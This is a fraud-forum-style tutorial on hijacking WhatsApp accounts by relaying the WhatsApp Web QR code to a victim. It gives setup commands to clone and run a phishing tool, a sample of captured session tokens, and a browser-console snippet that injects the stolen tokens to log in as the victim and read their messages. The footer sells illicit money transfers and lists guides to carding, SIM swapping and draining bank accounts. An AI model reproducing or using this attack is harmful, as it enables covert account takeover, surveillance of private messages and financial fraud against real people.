A 2021 GUIDE TO WHATSAPP PHISHING USING QR CODE

Hustlers, how are you today? A while ago we had written an article about how to sign up and verify international numbers on WhatsApp, today however you will learn a lot about WhatsApp phishing using nothing but its own QR code.

By the end of this article, you will be able to extract the QR code from Whatsapp Web and display it on a new page.

When your target will scan the QR code using Whatsapp it will grab the credentials from the web client and save them in a file. You can then use that file to log yourself in as your target who scanned the QR code and check their messages, history what’s even cooler is the fact that every time they will receive a message you will receive that message too, isn’t that cool?

HOW DOES IT WORK?

This will use node.js and socket.io for the website and selenium, a tool for scripting browsers, to communicate with the Whatsapp web client, it sounds daunting and overly complicated to those who are not familiar with programming but we can assure you that we will make it easy as a breeze.

The program starts a HTTP and a socket.io server. If a new client connects to socket.io the application will make a request to a selenium instance to start a new browser and connect to web.whatsapp.com. It will fetch the QR code data and send it to the client via the WebSocket connection. The client javascript then shows the QR code to the user.

If the QR code gets scanned Whatsapp will authenticate the selenium controlled browser and store some tokens in the localStorage and document cookie. We extract that data and save it into a text file. It will look like the code below:

CODE

{
"s":{
"remember-me":"true",
"WAVersion":"\"0.1.4391\"",
"qwefsdafadsdf==":"false",
"debugCursor":"146",
"WAWamDimensionCache":"{\"AppVersion\":\"0.1.4391\",\"BrowserVersion\":\"Firefox 39.0\",\"DeviceName\":\"Linux x86_64\",\"WebcEnv\":0}",
"WAToken2":"\"0.asldkamäsdflkasdfasdf\"",
"WAWamLastRotate":"1439140177924",
"WALangPref":"\"de-DE\"",
"WAWamStatus":"\"completed\"",
"y8fY/zQ8P+asdfadfg==":"[
...
]",
"WAToken1":"\"asdf+ams,dfhlaskdjfhasdfasdf=\"",
"Dexie.DatabaseNames":"[\"wawc\"]",
"storage_test":"storage_test",
"LKAJsdlksdjfasdf==":"false",
"logout-token":"\"alkjsdhfkjashldkjpweoaLKNKASBkasjbdaksdjLKjhhndosiaosa;AljkhJKhlKAJShkljqjDJSAOlkjbnhasdklWAdm==\"",
"ver":"1",
"whatsapp-mutex":"\"x781239870495:init0.987123490234\"",
"WASecretBundle":"{\"key\":\"sldkfjsdf+asdlfijlasdkjfasdf=\",\"encKey\":\"asldkfjasldkfjsdfsdf0=\",\"macKey\":\"a,sdfasdf+alskdjföalskdhiopasdf=\"}",
"WABrowserId":"\"aö,ksdjflöasdf==\""
},
"c":""

You can then import these tokens into your browser and log in as the person who scanned the QR code, still confused?

Just follow along and you will be amazed at how simple it actually is.

INSTRUCTIONS

  • Download the selenium standalone server jar file and install Firefox if you don’t already have it.
  • Type the following into your terminal

CODE

$ java -jar selenium-server.jar
$ # new terminal
$ git clone https://github.com/Mawalu/whatsapp-phishing.git
$ cd whatsapp-phishing
$ npm install
$ node index.js

Once you have done that, follow the steps along:

  • Open your browser and go to http://localhost:8080
  • Start Whatsapp on your smartphone, go to Menu > Whatsapp Web and scan the QR code from your browser.
  • Copy the content from the newly created secrets file
  • Open web.whatsapp.com. (Watch out that you are not already logged in, maybe use incognito mode)
  • Open your developer console

In that developer console you will copy/paste the following code:

CODE

var t = CONTENT_OF_YOUR_SECRETS_FILE
> function login(token) {Object.keys(token.s).forEach(function (key) {localStorage.setItem(key, token.s[key])}); token.c = token.c.split(‘;’); token.c.forEach(function(cookie) {document.cookie = cookie; });}
> login(t)

Great job! Now you will reload the page and surprise surprise! You should now be logged in as the person who scanned the QR code.

Was it that difficult? Things are easy when you know how to do them. Congrats today you have learned yet another amazing guide to keep in your knowledge arsenal. 

 

What are you waiting for? Meanwhile, we will see you on the other side!

 

CREDITS: 

BUY WU TRANSFERS HERE: 

BUY VENMO TRANSFERS HERE: 

BUY CASHAPP TRANSFERS HERE: 

 

BONUS ARTICLES: 

A GUIDE TO CASHOUT WITH GOOGLE PLAY USING CC’S 2021

HOW TO SIGN UP AND VERIFY INTERNATIONAL NUMBERS ON WHATSAPP 2021

2021 HOW TO CREATE YOUR GMAIL ACCOUNT WITHOUT A PHONE NUMBER? (requires pc/laptop)

THIS ONE TOOL MAKES IT EASIER FOR YOU TO EMPTY BANLK ACCOUNTS IN 2021

HERE IS THE LATEST SBA 2021 METHOD STEP BY STEP FOR FREE

A COMPEHENSIVE GUIDE TO POS CODES 2021

WHAT IS SIMSWAPPING AND HOW TO SIMSWAP IN 2021?

VENMO CARDING METHOD 2021